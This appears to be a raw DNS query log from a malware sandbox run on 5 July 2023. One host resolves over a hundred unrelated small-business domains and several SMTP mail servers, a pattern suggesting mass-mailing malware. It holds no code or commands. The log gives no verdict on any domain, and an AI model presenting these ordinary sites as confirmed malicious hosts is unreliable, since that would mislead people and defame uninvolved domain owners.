                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.421333075 CEST192.168.2.68.8.8.80xf53dStandard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.716682911 CEST192.168.2.6128.8.10.900xa1Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.717519999 CEST192.168.2.68.8.8.80xd16cStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.722409964 CEST192.168.2.68.8.8.80x1fcaStandard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.747690916 CEST192.168.2.68.8.8.80x127Standard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.762710094 CEST192.168.2.68.8.8.80x3be6Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.766077995 CEST192.168.2.68.8.8.80x8e5fStandard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.791034937 CEST192.168.2.68.8.8.80xb638Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.852402925 CEST192.168.2.6198.32.64.120xdcStandard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.906243086 CEST192.168.2.68.8.8.80xace0Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:19.150856018 CEST192.168.2.68.8.8.80xa164Standard query (0)hyab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:19.187411070 CEST192.168.2.68.8.8.80x7916Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:19.195190907 CEST192.168.2.68.8.8.80x81aaStandard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:19.413078070 CEST192.168.2.68.8.8.80x9734Standard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:19.422748089 CEST192.168.2.68.8.8.80xc26eStandard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:19.497644901 CEST192.168.2.68.8.8.80x41b1Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:19.515387058 CEST192.168.2.68.8.8.80xf111Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:19.582266092 CEST192.168.2.68.8.8.80x470fStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:19.964242935 CEST192.168.2.68.8.8.80x1c70Standard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:20.005625010 CEST192.168.2.68.8.8.80xe194Standard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:20.105407000 CEST192.168.2.68.8.8.80x9b94Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:20.242686987 CEST192.168.2.68.8.8.80x81aaStandard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:20.296925068 CEST192.168.2.68.8.8.80xa164Standard query (0)hyab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:20.573190928 CEST192.168.2.68.8.8.80x9734Standard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:20.742454052 CEST192.168.2.68.8.8.80xd637Standard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:20.757184029 CEST192.168.2.68.8.8.80xd9a2Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:20.787400961 CEST192.168.2.68.8.8.80xde79Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:21.032983065 CEST192.168.2.68.8.8.80x47a5Standard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:21.252784967 CEST192.168.2.68.8.8.80xffe2Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:21.574906111 CEST192.168.2.68.8.8.80x5b50Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:21.846297026 CEST192.168.2.68.8.8.80x7565Standard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:21.864491940 CEST192.168.2.68.8.8.80xac93Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:22.027141094 CEST192.168.2.68.8.8.80xb5aeStandard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:22.035502911 CEST192.168.2.68.8.8.80xe061Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:22.269903898 CEST192.168.2.68.8.8.80xe4a8Standard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:22.332284927 CEST192.168.2.68.8.8.80x1390Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:22.406516075 CEST192.168.2.68.8.8.80x40cdStandard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:22.573158979 CEST192.168.2.68.8.8.80x8b52Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:23.023322105 CEST192.168.2.68.8.8.80x7565Standard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:23.250642061 CEST192.168.2.68.8.8.80xd952Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:23.420562983 CEST192.168.2.68.8.8.80x1b52Standard query (0)smtp.mail.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:23.472227097 CEST192.168.2.68.8.8.80xfcdaStandard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:23.572890997 CEST192.168.2.68.8.8.80xb470Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:23.579813004 CEST192.168.2.68.8.8.80x1faStandard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:23.854805946 CEST192.168.2.68.8.8.80x7ee1Standard query (0)webways.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:23.983458042 CEST192.168.2.68.8.8.80xb5d7Standard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:23.993645906 CEST192.168.2.6198.32.64.120xf7Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:24.133855104 CEST192.168.2.6192.58.128.300x37Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:24.146230936 CEST192.168.2.68.8.8.80xa5e1Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:24.172403097 CEST192.168.2.6198.32.64.120x40Standard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:24.306829929 CEST192.168.2.68.8.8.80xd952Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:24.422430992 CEST192.168.2.68.8.8.80x1769Standard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:24.472625971 CEST192.168.2.68.8.8.80x3eb7Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:24.474064112 CEST192.168.2.68.8.8.80xe5aaStandard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:24.563968897 CEST192.168.2.68.8.8.80x7daeStandard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:24.585192919 CEST192.168.2.68.8.8.80x9655Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:24.709825993 CEST192.168.2.68.8.8.80xb3b9Standard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:24.967592001 CEST192.168.2.68.8.8.80x44e6Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.010493994 CEST192.168.2.68.8.8.80xcf10Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.044363022 CEST192.168.2.68.8.8.80xa4e4Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.173875093 CEST192.168.2.68.8.8.80x8a06Standard query (0)webavant.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.309719086 CEST192.168.2.68.8.8.80xa632Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.324194908 CEST192.168.2.68.8.8.80x92bStandard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.426939964 CEST192.168.2.68.8.8.80xe5a3Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.452682972 CEST192.168.2.68.8.8.80x23c8Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.587244034 CEST192.168.2.68.8.8.80x7daeStandard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.615943909 CEST192.168.2.68.8.8.80xe565Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.830884933 CEST192.168.2.68.8.8.80x1db4Standard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.929341078 CEST192.168.2.68.8.8.80x2c18Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.948432922 CEST192.168.2.68.8.8.80x7f48Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:25.956625938 CEST192.168.2.68.8.8.80x7fd3Standard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.065480947 CEST192.168.2.68.8.8.80x12b7Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.065545082 CEST192.168.2.68.8.8.80x3b8fStandard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.065792084 CEST192.168.2.68.8.8.80x6985Standard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.067235947 CEST192.168.2.68.8.8.80x1a1fStandard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.069003105 CEST192.168.2.68.8.8.80xb0eeStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.094599009 CEST192.168.2.68.8.8.80x5361Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.134227037 CEST192.168.2.68.8.8.80xbe79Standard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.296299934 CEST192.168.2.68.8.8.80x1990Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.320862055 CEST192.168.2.68.8.8.80xe5d6Standard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.491204023 CEST192.168.2.68.8.8.80x9bd9Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.638622046 CEST192.168.2.68.8.8.80x7656Standard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.762428999 CEST192.168.2.68.8.8.80x66c5Standard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:26.960465908 CEST192.168.2.68.8.8.80x19a0Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.000160933 CEST192.168.2.68.8.8.80xc063Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.079277039 CEST192.168.2.68.8.8.80x1b3fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.090620041 CEST192.168.2.68.8.8.80xe052Standard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.161185026 CEST192.168.2.68.8.8.80xecafStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.226521969 CEST192.168.2.68.8.8.80x6cabStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.239392996 CEST192.168.2.68.8.8.80x2272Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.271527052 CEST192.168.2.68.8.8.80x3882Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.305660963 CEST192.168.2.68.8.8.80x5a0cStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.359091997 CEST192.168.2.68.8.8.80x4730Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.390834093 CEST192.168.2.68.8.8.80x3681Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.448544025 CEST192.168.2.68.8.8.80x87fcStandard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.466120005 CEST192.168.2.68.8.8.80x8872Standard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.483829021 CEST192.168.2.68.8.8.80x9bd9Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.517497063 CEST192.168.2.68.8.8.80x7d0bStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.650434017 CEST192.168.2.68.8.8.80x6733Standard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.651900053 CEST192.168.2.68.8.8.80xd791Standard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.652039051 CEST192.168.2.68.8.8.80xbe0eStandard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.676104069 CEST192.168.2.68.8.8.80x61f5Standard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.676420927 CEST192.168.2.68.8.8.80x25c2Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.738383055 CEST192.168.2.68.8.8.80xbec5Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.747272968 CEST192.168.2.68.8.8.80x39c3Standard query (0)beafin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.857614040 CEST192.168.2.68.8.8.80xbe25Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.883095026 CEST192.168.2.68.8.8.80xc2e6Standard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:27.903340101 CEST192.168.2.68.8.8.80x8a44Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:28.088206053 CEST192.168.2.68.8.8.80x1b3fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:28.155139923 CEST192.168.2.68.8.8.80xc595Standard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:28.237154007 CEST192.168.2.68.8.8.80xe6e5Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:28.545872927 CEST192.168.2.68.8.8.80x9368Standard query (0)smtp.compuserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:28.704387903 CEST192.168.2.68.8.8.80xe5dbStandard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:28.706056118 CEST192.168.2.68.8.8.80x3f54Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:28.714849949 CEST192.168.2.68.8.8.80xcc83Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:28.759077072 CEST192.168.2.68.8.8.80x148dStandard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.054099083 CEST192.168.2.68.8.8.80x993cStandard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.167222023 CEST192.168.2.68.8.8.80x1b3fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.176973104 CEST192.168.2.68.8.8.80xabf6Standard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.193465948 CEST192.168.2.68.8.8.80x220eStandard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.247796059 CEST192.168.2.68.8.8.80x4d16Standard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.260817051 CEST192.168.2.6198.32.64.120xf7Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.449353933 CEST192.168.2.6198.32.64.120x40Standard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.486718893 CEST192.168.2.68.8.8.80x8111Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.572405100 CEST192.168.2.68.8.8.80x9368Standard query (0)smtp.compuserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.580374002 CEST192.168.2.68.8.8.80x4d6bStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.626220942 CEST192.168.2.68.8.8.80x2580Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.701734066 CEST192.168.2.68.8.8.80xe5dbStandard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.727657080 CEST192.168.2.68.8.8.80xcc83Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.727761984 CEST192.168.2.68.8.8.80x3f54Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.768589973 CEST192.168.2.68.8.8.80x148dStandard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.772080898 CEST192.168.2.68.8.8.80x44c8Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.816673040 CEST192.168.2.68.8.8.80xd00bStandard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.822540998 CEST192.168.2.68.8.8.80x200aStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.857348919 CEST192.168.2.68.8.8.80x2201Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:29.869863033 CEST192.168.2.68.8.8.80x2069Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:30.025027990 CEST192.168.2.68.8.8.80x993cStandard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:30.133940935 CEST192.168.2.68.8.8.80xabf6Standard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:30.211257935 CEST192.168.2.68.8.8.80x220eStandard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:30.229578972 CEST192.168.2.68.8.8.80x4d16Standard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:30.880547047 CEST192.168.2.68.8.8.80xb3d2Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.125967026 CEST192.168.2.68.8.8.80x10dbStandard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.135777950 CEST192.168.2.68.8.8.80x1b3fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.165071011 CEST192.168.2.68.8.8.80xe1eStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.187627077 CEST192.168.2.68.8.8.80xabf6Standard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.222121954 CEST192.168.2.68.8.8.80xd0e1Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.315310955 CEST192.168.2.68.8.8.80xcddStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.327445030 CEST192.168.2.68.8.8.80xc66bStandard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.423758984 CEST192.168.2.68.8.8.80x65e3Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.462888956 CEST192.168.2.68.8.8.80x4694Standard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.514976025 CEST192.168.2.68.8.8.80xb80eStandard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.578413010 CEST192.168.2.68.8.8.80x3daaStandard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.664788008 CEST192.168.2.68.8.8.80xc158Standard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:31.811956882 CEST192.168.2.68.8.8.80xaac6Standard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:32.125202894 CEST192.168.2.68.8.8.80x4b19Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:32.245742083 CEST192.168.2.68.8.8.80x8ef6Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:32.293289900 CEST192.168.2.68.8.8.80x2821Standard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:32.305823088 CEST192.168.2.68.8.8.80xcddStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:32.415250063 CEST192.168.2.68.8.8.80x195cStandard query (0)adeesa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:32.927942991 CEST192.168.2.68.8.8.80x4b9bStandard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:32.933779001 CEST192.168.2.68.8.8.80x7eb0Standard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:32.994400978 CEST192.168.2.68.8.8.80xaac6Standard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:33.157866001 CEST192.168.2.68.8.8.80x4b19Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:33.159010887 CEST192.168.2.68.8.8.80x135bStandard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:33.402324915 CEST192.168.2.68.8.8.80x365Standard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:34.243865967 CEST192.168.2.68.8.8.80xaac6Standard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:34.244221926 CEST192.168.2.68.8.8.80x4b19Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:34.363351107 CEST192.168.2.68.8.8.80x1010Standard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:34.452539921 CEST192.168.2.68.8.8.80xec13Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:34.454564095 CEST192.168.2.68.8.8.80xfd09Standard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:34.455785036 CEST192.168.2.68.8.8.80x4f32Standard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:34.625204086 CEST192.168.2.68.8.8.80xebb4Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:34.630132914 CEST192.168.2.6198.32.64.120xf7Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:34.719635963 CEST192.168.2.68.8.8.80x5e4bStandard query (0)smtp.mail.yahoo.comA (IP address)IN (0x0001)false
